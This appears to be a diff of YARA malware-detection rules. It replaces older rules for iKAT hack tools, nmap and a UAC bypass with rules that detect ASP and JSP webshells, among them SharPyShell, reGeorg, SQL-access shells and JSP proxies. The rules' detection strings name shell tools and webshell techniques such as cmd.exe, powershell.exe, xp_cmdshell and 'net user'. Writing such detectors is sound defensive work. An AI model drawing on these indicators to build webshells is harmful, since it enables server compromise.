+		$exec_proc2 = "start(" nocase wide ascii
+		$exec_shell1 = "cmd.exe" nocase wide ascii
+		$exec_shell2 = "powershell.exe" nocase wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		2 of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and filesize < 300KB and ( $input_http or all of ( $input_form* ) ) and all of ( $exec_proc* ) and any of ( $exec_shell* )
 }
-rule SIGNATURE_BASE_Ikat_Command_Lines_Agent
+rule SIGNATURE_BASE_WEBSHELL_ASP_Runtime_Compile : FILE
 {
 	meta:
-		description = "iKAT hack tools set agent - file ikat.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "35068d59-272d-55a6-b211-2c138276914c"
-		date = "2014-05-11"
-		modified = "2025-04-14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L843-L864"
+		description = "ASP webshell compiling payload in memory at runtime, e.g. sharpyshell"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5da9318d-f542-5603-a111-5b240f566d47"
+		date = "2021-01-11"
+		modified = "2023-04-05"
+		reference = "https://github.com/antonioCoco/SharPyShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5078-L5176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
-		logic_hash = "a39f8e388aa11c732156753f4a19aa9cc3ccd0437de30cdcc608926320a089b0"
+		hash = "e826c4139282818d38dcccd35c7ae6857b1d1d01"
+		hash = "e20e078d9fcbb209e3733a06ad21847c5c5f0e52"
+		hash = "57f758137aa3a125e4af809789f3681d1b08ee5b"
+		hash = "bd75ac9a1d1f6bcb9a2c82b13ea28c0238360b3a7be909b2ed19d3c96e519d3d"
+		hash = "e44058dd1f08405e59d411d37d2ebc3253e2140385fa2023f9457474031b48ee"
+		hash = "f6092ab5c8d491ae43c9e1838c5fd79480055033b081945d16ff0f1aaf25e6c7"
+		hash = "dfd30139e66cba45b2ad679c357a1e2f565e6b3140a17e36e29a1e5839e87c5e"
+		hash = "89eac7423dbf86eb0b443d8dd14252b4208e7462ac2971c99f257876388fccf2"
+		hash = "8ce4eaf111c66c2e6c08a271d849204832713f8b66aceb5dadc293b818ccca9e"
+		logic_hash = "6699a44e396eedebb3bafa0e89c3b6d080586a158ed056ec7220bdf2ad764444"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 19
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Extended Module: super mario brothers" fullword ascii
-		$s1 = "Extended Module: " fullword ascii
-		$s3 = "ofpurenostalgicfeeling" fullword ascii
-		$s8 = "-supermariobrotheretic" fullword ascii
-		$s9 = "!http://132.147.96.202:80" fullword ascii
-		$s12 = "iKAT Exe Template" fullword ascii
-		$s15 = "withadancyflavour.." fullword ascii
-		$s16 = "FastTracker v2.00   " fullword ascii
+		$payload_reflection1 = "System" fullword nocase wide ascii
+		$payload_reflection2 = "Reflection" fullword nocase wide ascii
+		$payload_reflection3 = "Assembly" fullword nocase wide ascii
+		$payload_load_reflection1 = /[."']Load\b/ nocase wide ascii
+		$payload_load_reflection2 = /\bGetMethod\(("load|\w)/ nocase wide ascii
+		$payload_compile1 = "GenerateInMemory" nocase wide ascii
+		$payload_compile2 = "CompileAssemblyFromSource" nocase wide ascii
+		$payload_invoke1 = "Invoke" fullword nocase wide ascii
+		$payload_invoke2 = "CreateInstance" fullword nocase wide ascii
+		$payload_xamlreader1 = "XamlReader" fullword nocase wide ascii
+		$payload_xamlreader2 = "Parse" fullword nocase wide ascii
+		$payload_xamlreader3 = "assembly=" nocase wide ascii
+		$payload_powershell1 = "PSObject" fullword nocase wide ascii
+		$payload_powershell2 = "Invoke" fullword nocase wide ascii
+		$payload_powershell3 = "CreateRunspace" fullword nocase wide ascii
+		$rc_fp1 = "Request.MapPath"
+		$rc_fp2 = "<body><mono:MonoSamplesHeader runat=\"server\"/>" wide ascii
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_input4 = "\\u0065\\u0071\\u0075" wide ascii
+		$asp_input5 = "\\u0065\\u0073\\u0074" wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
+		$sus_refl1 = " ^= " wide ascii
+		$sus_refl2 = "SharPy" wide ascii
 
 	condition:
-		4 of them
+		(( filesize < 50KB and any of ( $sus_refl* ) ) or filesize < 10KB ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and not any of ( $rc_fp* ) and ( ( all of ( $payload_reflection* ) and any of ( $payload_load_reflection* ) ) or ( all of ( $payload_compile* ) and any of ( $payload_invoke* ) ) or all of ( $payload_xamlreader* ) or all of ( $payload_powershell* ) )
 }
-rule SIGNATURE_BASE_Ikat_Cmd_As_Dll
+rule SIGNATURE_BASE_WEBSHELL_ASP_SQL : FILE
 {
 	meta:
-		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8d15b4b6-25f3-556c-bfa8-eba503c9c649"
-		date = "2014-05-11"
-		modified = "2025-04-14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L866-L884"
+		description = "ASP webshell giving SQL access. Might also be a dual use tool."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e534dcb9-40ab-544f-ae55-89fb21c422e9"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5178-L5359"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
-		logic_hash = "3f8390fb6eb16749e63379222a5899b811e7ccd6b3b219b60d7a621fd4595e7b"
-		score = 65
-		quality = 85
-		tags = ""
+		hash = "216c1dd950e0718e35bc4834c5abdc2229de3612"
+		hash = "ffe44e9985d381261a6e80f55770833e4b78424bn"
+		hash = "3d7cd32d53abc7f39faed133e0a8f95a09932b64"
+		hash = "f19cc178f1cfad8601f5eea2352cdbd2d6f94e7e"
+		hash = "cafc4ede15270ab3f53f007c66e82627a39f4d0f"
+		logic_hash = "c59250065c4be267746f716f922007b638706a76579af6509c8e97d0cee03f33"
+		score = 75
+		quality = -34
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = "cmd.exe" fullword wide
-		$s2 = "ReactOS Development Team" fullword wide
-		$s3 = "ReactOS Command Processor" fullword wide
-		$ext = "extension: .dll" nocase
+		$sql1 = "SqlConnection" fullword wide ascii
+		$sql2 = "SQLConnection" fullword wide ascii
+		$sql3 = "System" fullword wide ascii
+		$sql4 = "Data" fullword wide ascii
+		$sql5 = "SqlClient" fullword wide ascii
+		$sql6 = "SQLClient" fullword wide ascii
+		$sql7 = "Open" fullword wide ascii
+		$sql8 = "SqlCommand" fullword wide ascii
+		$sql9 = "SQLCommand" fullword wide ascii
+		$o_sql1 = "SQLOLEDB" fullword wide ascii
+		$o_sql2 = "CreateObject" fullword wide ascii
+		$o_sql3 = "open" fullword wide ascii
+		$a_sql1 = "ADODB.Connection" fullword wide ascii
+		$a_sql2 = "adodb.connection" fullword wide ascii
+		$a_sql3 = "CreateObject" fullword wide ascii
+		$a_sql4 = "createobject" fullword wide ascii
+		$a_sql5 = "open" fullword wide ascii
+		$c_sql1 = "System.Data.SqlClient" fullword wide ascii
+		$c_sql2 = "sqlConnection" fullword wide ascii
+		$c_sql3 = "open" fullword wide ascii
+		$sus1 = "shell" fullword nocase wide ascii
+		$sus2 = "xp_cmdshell" fullword nocase wide ascii
+		$sus3 = "aspxspy" fullword nocase wide ascii
+		$sus4 = "_KillMe" wide ascii
+		$sus5 = "cmd.exe" fullword wide ascii
+		$sus6 = "cmd /c" fullword wide ascii
+		$sus7 = "net user" fullword wide ascii
+		$sus8 = "\\x2D\\x3E\\x7C" wide ascii
+		$sus9 = "Hacker" fullword wide ascii
+		$sus10 = "hacker" fullword wide ascii
+		$sus11 = "HACKER" fullword wide ascii
+		$sus12 = "webshell" wide ascii
+		$sus13 = "equest[\"sql\"]" wide ascii
+		$sus14 = "equest(\"sql\")" wide ascii
+		$sus15 = { e5 bc 80 e5 a7 8b e5 af bc e5 }
+		$sus16 = "\"sqlCommand\"" wide ascii
+		$sus17 = "\"sqlcommand\"" wide ascii
+		$slightly_sus3 = "SHOW COLUMNS FROM " wide ascii
+		$slightly_sus4 = "show columns from " wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
 
 	condition:
-		all of ( $s* ) and $ext
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( 6 of ( $sql* ) or all of ( $o_sql* ) or 3 of ( $a_sql* ) or all of ( $c_sql* ) ) and ( ( filesize < 150KB and any of ( $sus* ) ) or ( filesize < 5KB and any of ( $slightly_sus* ) ) )
 }
-rule SIGNATURE_BASE_Ikat_Tools_Nmap
+rule SIGNATURE_BASE_WEBSHELL_ASP_Scan_Writable : FILE
 {
 	meta:
-		description = "Generic rule for NMAP - based on NMAP 4 standalone"
-		author = "Florian Roth (Nextron Systems)"
-		id = "be4858e6-a8f3-55eb-9c04-f4def838dde1"
-		date = "2014-05-11"
-		modified = "2025-04-14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L886-L903"
+		description = "ASP webshell searching for writable directories (to hide more webshells ...)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1766e081-0591-59ab-b546-b13207764b4d"
+		date = "2021-03-14"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5361-L5504"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
-		logic_hash = "f538d807ed4904a2c321385a095a97bc0d718349f7eb31a367e521228412cef2"
-		score = 50
-		quality = 83
-		tags = ""
+		hash = "2409eda9047085baf12e0f1b9d0b357672f7a152"
+		hash = "af1c00696243f8b062a53dad9fb8b773fa1f0395631ffe6c7decc42c47eedee7"
+		logic_hash = "80969fd0c27903dabf08a250a47971725ac5762fd2f9afd96167b8f88f277348"
+		score = 75
+		quality = -64
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Insecure.Org" fullword wide
-		$s1 = "Copyright (c) Insecure.Com" fullword wide
-		$s2 = "nmap" fullword nocase
-		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
+		$scan1 = "DirectoryInfo" nocase fullword wide ascii
+		$scan2 = "GetDirectories" nocase fullword wide ascii
+		$scan3 = "Create" nocase fullword wide ascii
+		$scan4 = "File" nocase fullword wide ascii
+		$scan5 = "System.IO" nocase fullword wide ascii
+		$scan6 = "CanWrite" nocase fullword wide ascii
+		$scan7 = "Delete" nocase fullword wide ascii
+		$sus1 = "upload" nocase fullword wide ascii
+		$sus2 = "shell" nocase wide ascii
+		$sus3 = "orking directory" nocase fullword wide ascii
+		$sus4 = "scan" nocase wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
 
 	condition:
-		all of them
+		filesize < 10KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and 6 of ( $scan* ) and any of ( $sus* )
 }
-rule SIGNATURE_BASE_Ikat_Startbar
+rule SIGNATURE_BASE_WEBSHELL_JSP_Regeorg : FILE
 {
 	meta:
-		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f29f15e9-aa29-519a-b4ad-c018aac68fd6"
-		date = "2014-05-11"
-		modified = "2025-04-14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L905-L925"
+		description = "Webshell regeorg JSP version"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cbb90005-d8f8-5c64-85d1-29e466f48c25"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "https://github.com/sensepost/reGeorg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5506-L5556"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
-		logic_hash = "adb29d4903a771b0dab9dee8313878757ff12fc014da86291e32eb3ec60bf551"
-		score = 50
-		quality = 85
-		tags = ""
+		hash = "6db49e43722080b5cd5f07e058a073ba5248b584"
+		hash = "650eaa21f4031d7da591ebb68e9fc5ce5c860689"
+		hash = "00c86bf6ce026ccfaac955840d18391fbff5c933"
+		hash = "6db49e43722080b5cd5f07e058a073ba5248b584"
+		hash = "9108a33058aa9a2fb6118b719c5b1318f33f0989"
+		logic_hash = "9d4c60a4daaadf6cefe8bf1d84b1e4af491cd23136332db4a022715b265c8f4e"
+		score = 75
+		quality = 50
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s2 = "Shinysoft Limited1" fullword ascii
-		$s3 = "Shinysoft Limited0" fullword ascii
-		$s4 = "Wellington1" fullword ascii
-		$s6 = "Wainuiomata1" fullword ascii
-		$s8 = "56 Wright St1" fullword ascii
-		$s9 = "UTN-USERFirst-Object" fullword ascii
-		$s10 = "New Zealand1" fullword ascii
+		$jgeorg1 = "request" fullword wide ascii
+		$jgeorg2 = "getHeader" fullword wide ascii
+		$jgeorg3 = "X-CMD" fullword wide ascii
+		$jgeorg4 = "X-STATUS" fullword wide ascii
+		$jgeorg5 = "socket" fullword wide ascii
+		$jgeorg6 = "FORWARD" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
 
 	condition:
-		all of them
+		filesize < 300KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and all of ( $jgeorg* )
 }
-rule SIGNATURE_BASE_Ikat_Tool_Generic
+rule SIGNATURE_BASE_WEBSHELL_JSP_HTTP_Proxy : FILE
 {
 	meta:
-		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a8064a26-09c0-59f1-bdf9-628a445014ff"
-		date = "2014-05-11"
-		modified = "2025-04-14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L927-L953"
+		description = "Webshell JSP HTTP proxy"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "55be246e-30a8-52ed-bc5f-507e63bbfe16"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5558-L5606"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5c5aa2d7d82d4b65541c5b6bcae6260fdaed0030493ed689363722cd78fd0a26"
-		score = 55
-		quality = 85
-		tags = ""
+		hash = "2f9b647660923c5262636a5344e2665512a947a4"
+		hash = "97c1e2bf7e769d3fc94ae2fc74ac895f669102c6"
+		hash = "2f9b647660923c5262636a5344e2665512a947a4"
+		logic_hash = "7183902d43fc633db06a41b4a6bc02d2eb5662b7ee08080b57563783b8b67568"
+		score = 75
+		quality = 50
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
-		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
-		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+		importance = 70
 
 	strings:
-		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
-		$s1 = "Failed to read the entire file" fullword
-		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
-		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
-		$s9 = "Running Zip pipeline..." fullword
-		$s10 = "<FinTitle />" fullword
-		$s12 = "<AutoTemp>0</AutoTemp>" fullword
-		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
-		$s15 = "AES Encrypting..." fullword
-		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
+		$jh1 = "OutputStream" fullword wide ascii
+		$jh2 = "InputStream" wide ascii
+		$jh3 = "BufferedReader" fullword wide ascii
+		$jh4 = "HttpRequest" fullword wide ascii
+		$jh5 = "openConnection" fullword wide ascii
+		$jh6 = "getParameter" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
 
 	condition:
-		all of them
+		filesize < 10KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and all of ( $jh* )
 }
-rule SIGNATURE_BASE_Bypassuac2
+rule SIGNATURE_BASE_WEBSHELL_JSP_Writer_Nano : FILE
 {
 	meta:
-		description = "Auto-generated rule - file BypassUac2.zip"
-		author = "yarGen Yara Rule Generator"
-		id = "8b7e49de-9b0a-5dc4-86af-1a854dc649cc"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L955-L967"
+		description = "JSP file writer"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "422a18f2-d6d4-5b42-be15-1eafe44e01cf"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5608-L5689"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
-		logic_hash = "398783fa0453a60fd1c6aa64eacfbfa7c5385e81c79d1b6a8a8386dae9b825cc"
+		hash = "ac91e5b9b9dcd373eaa9360a51aa661481ab9429"
+		hash = "c718c885b5d6e29161ee8ea0acadb6e53c556513"
+		hash = "9f1df0249a6a491cdd5df598d83307338daa4c43"
+		hash = "5e241d9d3a045d3ade7b6ff6af6c57b149fa356e"
+		logic_hash = "44c11570c610b849ba9c7506fd9ef3575d270e79d7aaf5c26d54ab3f64cfc94f"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 23
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
-		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
-		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
+		$payload1 = ".write" wide ascii
+		$payload2 = "getBytes" fullword wide ascii
+		$payload3 = ".decodeBuffer" wide ascii
+		$payload4 = "FileOutputStream" fullword wide ascii
+		$logger1 = "getLogger" fullword ascii wide
+		$logger2 = "FileHandler" fullword ascii wide
+		$logger3 = "addHandler" fullword ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
